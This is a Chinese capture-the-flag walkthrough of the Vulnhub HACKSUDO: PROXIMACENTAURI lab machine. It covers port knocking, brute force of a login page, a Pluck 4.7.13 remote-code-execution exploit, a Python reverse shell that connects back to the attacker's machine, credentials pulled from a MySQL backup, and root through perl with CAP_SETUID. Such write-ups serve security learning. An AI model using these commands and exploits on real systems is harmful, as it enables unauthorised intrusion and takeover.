Vulnhub-HACKSUDO: PROXIMACENTAURI渗透

news2024/9/21 12:26:23

文章目录

  • 一、前言
    • 1、靶机ip配置
    • 2、渗透目标
    • 3、渗透概括
  • 开始实战
    • 一、信息获取
    • 二、端口敲门
    • 三、web密码爆破
    • 四、getShell
    • 五、获取新用户
    • 六、提权

一、前言

由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
 如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!

 👉本文靶机下载连接-戳我直接下载!👈

1、靶机ip配置

  • Kali IP:192.168.2.4
  • 靶机IP:192.168.2.5靶机ip获取方式如下图
    在这里插入图片描述

2、渗透目标

  • 获取到/root/目录下的flag文件

3、渗透概括

  1. web源码审查
  2. 根据抽象的信息获取有用的信息(端口号)
  3. 端口敲门
  4. 通过ssh获取信息
  5. web密码爆破
  6. pluck 4.7.13的远程代码执行漏洞利用
  7. mysql数据库获取有用信息
  8. perl的Capabilities提权


开始实战

一、信息获取

使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP如下所示
在这里插入图片描述

可以看到,扫出来了22 80/http但是22端口被防火墙过滤了,根以往的经验很有可能是端口敲门

我们先看看80/http的页面,如下图
在这里插入图片描述

在页面里面没有发现什么东西,我们使用gobuster工具对该网站的目录爆破一下

gobuster dir -u http://192.168.2.5/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x jpg,php,txt,html

如下,扫描出来的结果还是比较多,就不全部写出来了
我们主要看到login.php页面/planet目录
在这里插入图片描述
我访问一下login.php页面,发现要密码,我们就先放着
在这里插入图片描述

我们再看看/planet目录,里面有一个文件夹travel,我们继续点开
在这里插入图片描述

我们点开之后就可以看到如下页面,我们按f12,打开源码审查,全部展开就可以看到该页面有一个提示信息
给了我们一个连接https://g.co/kgs/F9Lb6b
在这里插入图片描述

我们直接使用浏览器访问这个网址,就可以看到如下信息,我们点击显示的第一个信息
在这里插入图片描述

如下,点开之后我们可以看到如下图标注的消息是14 29 43(43是四舍五入的,因为测试42没打开)很有可能就是我们需要敲的端口(有点离谱……)

在这里插入图片描述

二、端口敲门

那么我就自己写一个python脚本用于端口敲门,脚本名为knock.py
代码如下

import socket

def send_syn_request(host, port):
    try:
        # 创建 TCP socket 对象
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # 发送 SYN 请求
        s.settimeout(0.1)  # 设置连接超时时间为0.1秒
        s.connect((host, port))
        s.close()
    except (socket.timeout, socket.error):
        pass
    print(f"已发送 SYN 请求到端口 {port}")
    
    
# 指定主机和端口列表
host = "192.168.2.5"

#需要敲的端口列表
ports = [14, 29, 43]
# 发送 SYN 请求到每个端口
for port in ports:
    send_syn_request(host, port)

如下,使用命令python kncok.py运行一下敲门脚本
当我们运行完脚本之后再次扫描靶机的22端口就可以看到该端口的状态就为open
在这里插入图片描述

三、web密码爆破

我们先用ssh连接一下试试,虽然没有密码,但是如下图,回显信息给了我们一个链接
https://github.com/hacksudo/fog-hacksudo/blob/main/blackhole.lst
在这里插入图片描述

给了我们一个字典,大胆猜测一下,这个可能就是前面的那个登录页面的密码
在这里插入图片描述

我们使用Burpsuite抓一个这个页面的登录包,是一个POST请求
在这里插入图片描述

我们ctrl + i发送到攻击模块,并且把密码区域添加为变量
在这里插入图片描述

我把刚刚github上面的密码添加进来,然后点击Start attack按钮开始爆破
在这里插入图片描述

如下,有一个包的长度是1464,那密码就是hacktheplanet没错了
在这里插入图片描述

如下,我们已经成功登录,并且报了该网站的具体版本号pluck 4.7.13
在这里插入图片描述

四、getShell

我们直接在kali里面搜索这个框架对应的版本的exp,如下可以看到有一个远程命令执行的pythonexp
在这里插入图片描述

我们直接用cp命令拷贝一份下来
在这里插入图片描述

打开看一下怎么用,如下图可以看到该exp需要四个参数分别是靶机的ip 端口 密码 路径
在这里插入图片描述

我们按照要求执行以下该exppython 49909.py 192.168.2.5 80 hacktheplanet /
如下图,返回结果告诉我们攻击成功,并且给了我们一个shell的URL
在这里插入图片描述

我们访问该URL就可以看到一个类似终端的命令执行页面
在这里插入图片描述

由于这个用的不是很舒服,我们需要把这个shell反弹到kali上
我们在kali上用nc -lvvp 1234监听一下
在这里插入图片描述

然后使用利用python挂一下反弹shell,命令如下

#需要把ip替换为自己实际的靶机ip
export RHOST="192.168.2.4";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

在这里插入图片描述

如下我们的nc就监听到靶机弹过来的shell了
在这里插入图片描述

五、获取新用户

我们到处翻一下,在/var目录下发现了/backups目录,并且在该目录里面有一个mysql.bak的数据库备份文件
在这里插入图片描述

我们使用cat命令看一下这个数据库备份文件里面的内容
发现了一个数据库用户alfauser和一个密码passw0rd
在这里插入图片描述

那么我们就用这个账户密码登陆一下这个靶机的mysql
命令为mysql -u alfauser -ppassw0rd
在这里插入图片描述

通过如下的操作,我们获取到了一个新的用户proxima和密码alfacentauri123
在这里插入图片描述

我们使用exit命令退出数据库,并且使用su命令通过我们上一步获取到账户密码登录到这个新的用户
在这里插入图片描述

六、提权

我们使用find / -perm -u=s 2>/dev/null命令找一下具有suid权限的可执行文件
如下图,然而并没有发现什么可利用的可执行程序
在这里插入图片描述

我们使用getcap -r / 2>/dev/null命令找一下有没有具有特殊能力的文件
如下找到了一个perl程序被赋予了CAP_SETUID能力
在这里插入图片描述

我们到当前用户的家目录
发下有一个proximaCentauriA目录,我们进入到该目录
通过执行./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'来进行Capabilities提权
在这里插入图片描述

我们进入到/root目录,拿到最终的flag文件root.txt至此我们的渗透完成
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1381646.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【同济子豪兄斯坦福CS224W中文精讲】NetworkX代码学习笔记

文章目录 安装配置创建图可视化图图数据挖掘参考资料 安装配置 matplotlib中文字体设置 import networkx as nx import matplotlib.pyplot as plt # 魔法指令,设置后在jupyter notebook中绘制的图形会显示在输出单元格中,而不是弹出一个新窗口 %matplo…

ssm基于Javaweb的网上奶茶店系统的设计与实现论文

摘 要 计算机网络发展到现在已经好几十年了,在理论上面已经有了很丰富的基础,并且在现实生活中也到处都在使用,可以说,经过几十年的发展,互联网技术已经把地域信息的隔阂给消除了,让整个世界都可以即时通话…

爬虫之牛刀小试(四):爬取B站番剧的简介

今天爬取的是b站。 如何爬取b站中的番剧呢? 首先我们来到番剧索引中,随便点开一部动漫,检查代码。 每个作品对应一个链接: https://www.bilibili.com/bangumi/play/ss…(ss后面的数字称为ss号) 发现关于动漫的信息…

【数据库】sql优化有哪些?从query层面和数据库层面分析

目录 归纳sql本身的优化数据库层面的优化 归纳 这类型问题可以称为:Query Optimization,从清华AI4DB的paper list中,该类问题大致可以分为: Query RewriterCardinality EstimationCost EstimationPlan Optimization 从中文的角…

某厂校招一道关于C的笔试题

一、笔试原题 题目:在Linux x86 _ 54 gcc环境下,下面的程序会出现什么问题?运行结果是什么?为什么? 程序如下图: 通过在gcc的环境下编译运行,发现运行结果为不断死循环打印0-17的数字 我们…

TCP之三次握手四次挥手与UDP区别

文章目录 1 TCP三次握手四次挥手1.1 数据包说明1.1.1 TCP数据包1.1.2 UDP数据包1.1.3 TCP和UDP差异1.1.4 TCP可靠性传输机制 1.2 三次握手1.2.1 三次握手定义1.2.2 三次握手问题1.2.2.1 问题引入分析1.2.2.2 历史连接1.2.2.3 同步双方初始序列号1.2.2.4 避免资源浪费 1.3 四次挥…

Github Copilot AI保密级教程

Copilot 是一款由 OpenAI 推出的人工智能代码自动补全AI工具,它可以帮助程序员更快、更准确地编写代码。Copilot 的核心技术基于 GPT-3 模型,但是在编码方面是优于GPT-3的,它可以根据程序员输入的上下文和代码提示,自动生成符合语…

微信小程序如何自定义导航栏,怎么确定导航栏及状态栏的高度?导航栏被刘海、信号图标给覆盖了怎么办?

声明:本文为了演示效果,颜色采用的比较显眼,可根据实际情况修改颜色 问题描述 当我们在JSON中将navigationStyle设置成custom后,当前页面的顶部导航栏就需要我们制作了,但出现了一下几个问题: 导航栏的高…

51-12 多模态论文串讲—BLIP 论文精读

视觉语言预训练VLP模型最近在各种多模态下游任务上获得了巨大的成功,目前还有两个主要局限性: (1) 模型角度: 大多数方法要么采用encoder模型,要么采用encoder-decoder模型。然而,基于编码器的模型不太容易直接转换到文本生成任务&#xff0…

高德打车引入“红绿灯倒计时”能力,算力技术升级打车体验

打到的车还有多久能到?接驾车辆原地不动是什么原因?乘客在打车时,常常因为无法了解实时接驾路况,容易出现“等车焦虑”。 如今,高德打车已全面应用“红绿灯倒计时”能力,让乘客在等车时就能掌握接驾路况&am…

在线ai扩图是什么?有什么工具?分享3个好用的工具。

在线ai扩图是什么?有什么工具?分享3个好用的工具。 在当今数字化的时代,图像处理成为了我们日常生活和工作中不可或缺的一部分。有时候,我们需要将图像放大以获取更多的细节,但传统的方法往往会导致图像质量的损失。幸…

阿里云服务器ECS介绍_高性能云服务器_为了无法计算的价值

阿里云高性能云服务器60%单实例最大性能提升,35Gbps内网带宽,网络增强&通用型云服务器、本地SSD型云服务器、大数据型云服务器、GPU异构型云服务器,阿里云百科aliyunbaike.com分享阿里云高性能云服务器: 阿里云高性能云服务器…

云原生分布式多模架构:华为云多模数据库 GeminiDB 架构与应用实践

文章目录 前言一、GeminiDB 总体介绍1.1、华为云数据库全景图1.2、GeminiDB 发展历程1.3、GeminiDB 全球分布情况 二、GeminiDB 云原生架构2.1、核心设计:存算分离&多模扩展2.2、存算分离&多模扩展核心优势2.3、高可用:秒级故障接管2.4、弹性扩展…

java基于SSM框架的宿舍管理系统的设计与实现论文

摘 要 在如今社会上,关于信息上面的处理,没有任何一个企业或者个人会忽视,如何让信息急速传递,并且归档储存查询,采用之前的纸张记录模式已经不符合当前使用要求了。所以,对宿舍信息管理的提升&#xff0c…

高精度恒流/恒压(CC/CV)原边反馈功率转换器

一、产品概述 PR6214是一款应用于小功率AC/DC充电器和电源适配器的高性能离线式功率开关转换器。PR6214采用PFM工作模式,使用原边反馈架构,无需次级反馈电路,因此省去了光耦和431,应用电路简单,降低了系统的成本和体积…

macbook安装配置maven3.6.1(包含将jdk更新至11版本)

参考博客: https://blog.csdn.net/qq2019010390/article/details/125472286 下载和安装 首先,在maven官网下载macOS系统所需的压缩包 官网的地址:https://maven.apache.org/download.cgi 因为要下载的版本是3.6.1,所以要在历史…

K8S后渗透横向节点与持久化隐蔽方式探索

前言 通常在红蓝对抗中,我们可能会通过各种方法如弱口令、sql注入、web应用漏洞导致的RCE等方法获得服务器的权限;在当前云原生迅猛发展的时代,这台服务器很可能是一个容器,在后续的后渗透由传统的提权变为容器逃逸,内…

山海鲸:开创城市发展管理可视化新篇章

随着城市化进程的加速,城市管理面临着前所未有的挑战。如何实现高效、精准的城市管理,提升城市居民的生活质量,成为城市发展亟待解决的问题。山海鲸城市发展管理可视化解决方案应运而生,它利用先进的技术和创新的理念,…

使用ffmpeg对视频进行静音检测

1 原始视频信息 通过ffmpeg -i命令查看视频基本信息 ffmpeg version 6.1-essentials_build-www.gyan.dev Copyright (c) 2000-2023 the FFmpeg developersbuilt with gcc 12.2.0 (Rev10, Built by MSYS2 project)configuration: --enable-gpl --enable-version3 --enable-sta…

第11章 2 文件和io操作 +

本章总结和章节选择题 p160 很奇怪,只有先写了列表,在遍历file 才有打印 若文件原来就有内容,w open 完之后,文件内容就被清空了 open操作若不指定打开模式,默认打开模式是r 文本打开时,是按照字符串 实…